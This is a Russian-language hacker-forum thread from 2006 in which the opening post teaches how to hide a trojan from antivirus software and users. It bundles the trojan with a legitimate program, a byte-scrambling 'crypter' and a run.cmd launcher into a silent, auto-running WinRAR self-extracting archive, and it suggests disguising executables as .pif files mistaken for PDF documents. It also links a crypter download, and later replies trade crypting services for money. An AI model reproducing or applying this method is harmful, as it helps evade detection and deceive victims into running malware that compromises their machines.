Прячем трояны от антивирусов, пользователей, собак и кошек =) |
03.11.2006, 21:23
|
|
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами:
10371202
Репутация:
341
|
|
Прячем трояны от антивирусов, пользователей, собак и кошек =)
И так у нас есть трой...НО он палится антивирями. Что делать? Идти покупать криптор - нет это не для нас... Писать свой трой или криптор - не все умеют, а иногда лень...
Теперь мы сделаем это подручными средствами за минуту...
Нужно: winRAR и программа crypter, написанная Talisman'ом специально для этого дела...
1. Подготавливаем внутренность архива.
Внутренности архива:
Ваши файлы + 3 следующих файла:
1. run.cmd
2. 1.exe
3. crypter.exe, найдете в конце статьи
----
1.exe - и есть ваш троянчек.
В run.cmd пишем следующее:
Код:
start yourprogramm.exe
start crypter.exe
start 1.exe
exit
, где yourprogramm.exe - ваша нормальная программа.
Что это делает?
при запуске run.cmd у нас запускается crypter.exe и все=)
Теперь рассмотрим crypter.exe:
Это всего навсего программа, которая меняет порядок байт в файле(то есть делает кашу). При первом запуске она меняет порядок файлов, при втором возвращает все на место.
-----
И так для первого шага кладем ваш exe'шный файл в какую-то папку, туда же кладем своего трояна с именем 1.exe, туда же кладем run.cmd с кодом выше^^ и туда же кладем cryptor.exe.
Теперь запускаем crypter.exe и у нас файл перепутался и антивирус теперь не палит его...
2. Делаем sfx архив:
Выделяем наши файлы и жмем добавить в архив.
Отмечаем пункт 'Создать SFX-архив'.
Переходим на вкладку дополнительно и жмем 'Параметры SFX'.
Переходим на вкладку Режимы и отмечаем пункт Скрыть все и Перезаписывать все файлы (теперь при запуске архива не будет выводиться никаких окон).
Переходим на вкладку Общие. Нас будет интересовать путь для распаковки. Можно здесь прописать путь к папке в которую будут извлекаться файлы. Все файлы будут извлекаться в одну папку. Можете написать "%windir%".
Иконку для результирующего исполняемого файла можно выбрать на вкладке Текст и Иконки , нажав на кнопку Обзор.
На вкладке Общие в поле выполнить после распаковки пишем run.cmd
---------
Дополнение:
Переименуем любой exe файл в pif.
О-ба! все работает так же=) но во-первых pif'a в винде не видно и во-вторых очень часто путают с документами Acrobat Reade'a 
---------
Pif с непропатченным браузером IE запускается при клике на ссылку, не нужно нажимать сохранить и так далее...
---------
Статья сделана на основе http://forum.antichat.ru/thread24979.html
Она будет постепенно обновляться, так как у меня есть еще очень много полезных идей, чтоб замаскировать троян от антивирусов.
============================
Crypter.exe:
Работает только с файлом с именем 1.exe
http://slil.ru/23344495
Написал Talisman
============================
Просьба писать о всех недочетах и ошибках, найденных в статье
Последний раз редактировалось ReanimatoR; 30.01.2007 в 18:47..
|
|
|
03.11.2006, 23:12
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами:
10441826
Репутация:
354
|
|
ReanimatoR каспер 6 палит, последние обновления, обновления за месяц! Антивирь палит ИМХО.
|
|
|
|
03.11.2006, 23:23
|
|
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами:
10371202
Репутация:
341
|
|
Ясное дело проактивная защита будет палить=)
а проскань на вирусджоти = не будет...
это еще не все=) я еще буду дописывать...
100% не палящийся способ= на этом яб не плохо заработал=)
А это инфа к размышлению и додумыванию
|
|
|
|
03.11.2006, 23:34
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами:
10441826
Репутация:
354
|
|
ReanimatoR ты б лучше криптор выложил для ламаков каких нибудь, у меня их довала, но они приватные и дать немогу(кстати я их взял бесплатно, сеть 2 месяца серфинговал)
|
|
|
|
03.11.2006, 23:39
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами:
10467686
Репутация:
930
|
|
Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.
|
|
|
|
03.02.2007, 02:23
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
С нами:
10871526
Репутация:
131
|
|
Сообщение от Ksander
Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.
полне согласен , НО товарисч помог тем которые ищут то что не могут сами зделать или написать , то есть комуто + и не тока кому то , а и от кавота если не забудут тож , я думаю не сложно 1 рах написать для кавота то есть для чайника что и как и почему , если он не дурак возможность использует ну а если дурак то увы , етот + в сторону каспера итп......
|
|
|
|
03.11.2006, 23:42
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 74
С нами:
10339586
Репутация:
36
|
|
~Real F@ck!~
Угумс, я видел....
Как на dl, про тебя писали что ты ко всем в аси лез и просил криптор
Смотреть тут |
|
|
|
03.11.2006, 23:54
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами:
10441826
Репутация:
354
|
|
ReanimatoR ненадо выкладывать криптор, я так к слову сказал, у меня их довала, а кому надо тот пусть тему или ещё что нить создаёт!
|
|
|
|
04.11.2006, 00:57
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами:
10441826
Репутация:
354
|
|
Talisman +1
Ksander эт ты ачат позориш нах, я ваще в халяву попросился, меня непустили да ещё и вот это повесили, и ещё всё началось лиш из-за пинча 2.60 который с дамагелаба я выложил на античат!
Mukis несмеши людей, я за 1$ криптую а ты за 3$ ! У меня ток аваст палит и сё, если у тебя даже нечё непалит ты что то с ценой загнул!
|
|
|
|
04.11.2006, 12:27
|
|
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами:
10371202
Репутация:
341
|
|
Мда...собрались люди...
1. удалите свой флуд. Разборки в ПМ
2. это НЕ КРИПТОР! Это всего навсего штука, которая делает из файла КАШУ. И чтоб запустить файл, нужно опять запустить эту прогу=). Это можно делать любым архиватотром, который поддерживает раззиповку с паролем из командной строки(например Orien)
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
